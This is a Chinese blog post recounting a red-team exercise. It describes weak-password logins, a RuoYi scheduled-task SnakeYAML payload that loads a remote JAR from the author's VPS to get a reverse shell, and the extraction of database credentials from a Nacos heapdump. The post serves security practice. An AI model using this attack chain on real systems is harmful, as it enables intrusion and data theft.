一次攻防演练记录

admin 2024年9月12日11:33:34评论15 views字数 1198阅读3分59秒阅读模式

前言

针对之前参加的某地区攻防演练做个记录,演练时间只有两天,第二天还给自己干阳了,烧了一天39度多。

打点

若依

某个系统,太典了,直接弱口令进入

一次攻防演练记录

作为一个安服仔,测xss成被动了,想想难以深入利用,本身就是管理员账号,不过可以钓鱼拿个人主机权限,也是有分的,不过比较麻烦,时间不是那么充足,这里就不考虑了

一次攻防演练记录

这个系统也有计划任务功能,按照网上的一个方法,将反弹shell的jar包传到我的vps上,启了个web服务

一次攻防演练记录

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [  !!java.net.URLClassLoader [[    !!java.net.URL ["http://vps地址/yaml-payload.jar"]   ]]]')

这里执行之后无任何反应,不过只访问vps地址的时候倒是收到请求了,感觉有戏,又尝试了下jndi注入,也是没有成功

看了看其他地方,这里看到了jdk的版本,好像有点高,所以无法进行一般的jndi注入

一次攻防演练记录

这里经过高手指挥,下载了个高版本下的利用工具

https://github.com/C3P0ooo/LDAPDeserialize-tool

自己打包一下,传到vps上然后执行命令
一次攻防演练记录
计划任务调度方法
一次攻防演练记录

收到请求

一次攻防演练记录
成功反弹shell,不过是云服务器,也没啥后续深入
一次攻防演练记录

数据库

首先网站A为https://tjaa.xxx.com/#/login,这里弱口令admin、123456直接跑出来了,不过功能点很少

然后网站B为https://admin.xxx.com/#/login,跟A为同类型网站

一次攻防演练记录

这里测试admin账号是存在的,但是密码爆不出来

一次攻防演练记录

回到网站A,这里猜测默认密码应该就为123456

一次攻防演练记录

于是拿这个密码去admin网站跑用户名,最后跑出来了很多,一一验证发现ceshi这个账号是有全部权限的,数据量还挺大的

一次攻防演练记录

发现此站点下有nacos服务,直接就是弱口令进入

一次攻防演练记录

在配置文件里面发现了数据库连接地址,但是密码是错误的
一次攻防演练记录

但是又发现了heapdump文件

一次攻防演练记录

一次攻防演练记录
这里直接破解出了账号密码,heapdump敏感信息工具地址
https://github.com/whwlsfb/JDumpSpider

一次攻防演练记录

成功连接,好像是个中央数据库,所有的数据都在这里了,也是云服务器,拿不拿主机权限都一样
一次攻防演练记录
在提交两个成果之后,本以为怎么也有五六千分了吧,结果被告知重复,在上午刚开始9点钟就已经被提交过了(目标开始前就收到了,下次一定提前连夜打)
一次攻防演练记录

第二天直接阳了,实在干不动了,还有很多口子没有深入测试,提交了几个弱口令和未授权访问就草草结束了

总结

打攻防演练最重要的还是抢占先机,除非你有0day才能悠闲的品品茶,另外对于很多cms后台的RCE还是熟练比较好,不然现搜利用方法还是有点浪费时间的,等你交完报告都被别人蹂躏完了。

原文始发于微信公众号(起凡安全):一次攻防演练记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月12日11:33:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次攻防演练记录http://cn-sec.com/archives/3157719.html

发表评论

匿名网友 填写信息